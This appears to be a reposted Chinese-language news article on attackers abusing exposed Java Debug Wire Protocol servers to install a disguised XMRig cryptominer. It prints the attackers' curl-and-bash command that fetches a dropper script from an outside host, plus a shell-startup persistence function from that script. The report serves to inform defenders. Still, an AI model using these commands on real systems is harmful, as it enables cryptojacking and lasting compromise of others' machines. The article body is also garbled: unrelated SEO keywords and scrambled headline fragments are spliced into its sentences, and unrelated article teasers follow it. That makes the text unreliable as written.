黑客利用暴露在公网的Java调试协议服务器部署挖矿恶意软件
网络安全研究人员发现新一轮网络攻击正针对那些无意中将Java调试线协议(JDWP)服务器暴露在互联网上的黑客组织机构。攻击者利用这一被忽视的利用入口点,部署复杂的暴露部署加密货币挖矿恶意软件 。

JDWP作为Java平台的公网标准功能,本意是试协让开发人员能够检查实时应用程序,从而促进远程调试。议服但当JDWP在生产系统中保持可访问状态时——通常由于配置错误或在生产环境中使用开发标志——它就会成为远程代码执行的器挖矿强大载体 。
这种威胁的恶意出现伴随着快速的亿华云利用周期 。在多个观察到的软件案例中,攻击者能够在系统暴露后数小时内入侵易受攻击的黑客机器 。攻击流程通常始于对开放JDWP端口(最常见的利用是5005端口)的大规模互联网扫描。一旦识别到目标 ,暴露部署攻击者会发起JDWP握手以确认服务处于活动状态,公网然后建立会话,试协获得对Java虚拟机(JVM)的议服交互式访问权限 。源码库这种访问权限使攻击者能够枚举加载的类并调用方法,最终实现在主机上执行任意命令 。
攻击技术分析Wiz安全分析师在观察到针对其TeamCity(一种流行的CI/CD工具)蜜罐服务器的利用尝试后,确认了此次攻击活动 。攻击者表现出高度的自动化和定制化能力 ,部署了经过修改的XMRig挖矿程序,其中包含硬编码配置以规避检测。
值得注意的是高防服务器,该恶意软件使用矿池代理来隐藏目标钱包地址 ,增加了追踪或破坏非法挖矿操作的难度。这些攻击的影响十分严重。通过滥用JDWP ,威胁行为者不仅可以部署挖矿程序 ,还能建立深度持久性 、操纵系统进程 ,并可能转向入侵环境中的其他资产 。恶意软件隐蔽的特性,模板下载加上其能够伪装成合法系统工具的能力 ,增加了长期未被发现活动和资源耗尽的风险。
感染链剖析聚焦感染机制,攻击者利用JDWP缺乏身份验证的特点,直接通过协议注入和执行shell命令 。建立会话后 ,他们通常会使用如下命令下载投放器脚本(如logservice.sh) :
复制curl -o /tmp/logservice.sh -s https://canonicalconnect[.]com/logservice.sh bash /tmp/logservice.sh1.2.该脚本经过精心设计 ,能够终止竞争挖矿程序 ,下载伪装成logrotate的恶意XMRig二进制文件 ,并将其安装到用户的云计算配置目录中 。随后 ,脚本会设置多种持久化机制,包括修改shell启动文件、创建定时任务以及安装伪造的系统服务 。
以下代码片段展示了脚本如何通过shell配置确保持久性:
复制add_to_startup() { if [ -r "q" ]; then if ! grep -Fxq "$EXEC >/dev/null 2>&1" "q"; then echo "$EXEC >/dev/null 2>&1" >> "q" fi fi }1.2.3.4.5.6.7.
这种感染链既高效又具有弹性,使得挖矿程序能够在系统重启和用户登录后继续存活。攻击者使用看似合法的进程名称和系统位置,进一步增加了检测和修复的难度,这凸显了加强配置管理和严格监控暴露服务的必要性 。建站模板
相关文章

一月头号恶意软件:Vidar 重返榜单,Earth Bogle njRAT 攻击活动爆发
2023 年 2 月,网络安全解决方案提供商 Check Point® 软件技术有限公司纳斯达克股票代码:CHKP)发布了其 2023 年 1 月《全球威胁指数》报告。上月,在品牌劫持事件增加后,信息2025-12-07
进入十四五以来,“双碳”战略成为百行百业关注的热点话题。作为先进要素高度集聚的主要载体,园区的能耗问题已经成为各方关注的重点,积极探索数字化技术赋能园区碳中和发展路径,构建“零碳智慧园区”,赋能园区智2025-12-07
虚拟光驱XP系统安装教程(使用虚拟光驱在XP系统上安装软件的简易指南)
在XP系统中,有时候我们需要安装一些软件,但是并不方便使用实体光盘来进行安装,这时候,虚拟光驱就可以派上用场了。虚拟光驱可以模拟真实光驱的功能,将软件镜像文件加载为虚拟光盘进行安装。本文将详细介绍如何2025-12-07
戴尔科技集团Dell Technologies)的一项最新调研显示,随着近两年企业数字化转型的加速,有一半的IT领导者表示,虽然公司知道如何才能完成员工队伍的数字化转型,但在快速转型的过程中,仍有部分2025-12-07
Endor Labs 引入了OWASP风格的清单,列出了使用开源软件 (OSS) 中固有的最重要或影响最大的风险。OSS 的使用实际上是免费的,而且随时可用——它满足了软件开发中对速度和低成本的商业需2025-12-07
随着时间的推移,电脑系统常常会出现各种问题,比如运行缓慢、程序崩溃、病毒感染等。在这种情况下,重装系统是解决问题的最佳选择之一。本文将为您提供一键重装系统教程,帮助您轻松解决Windows7系统问题,2025-12-07

最新评论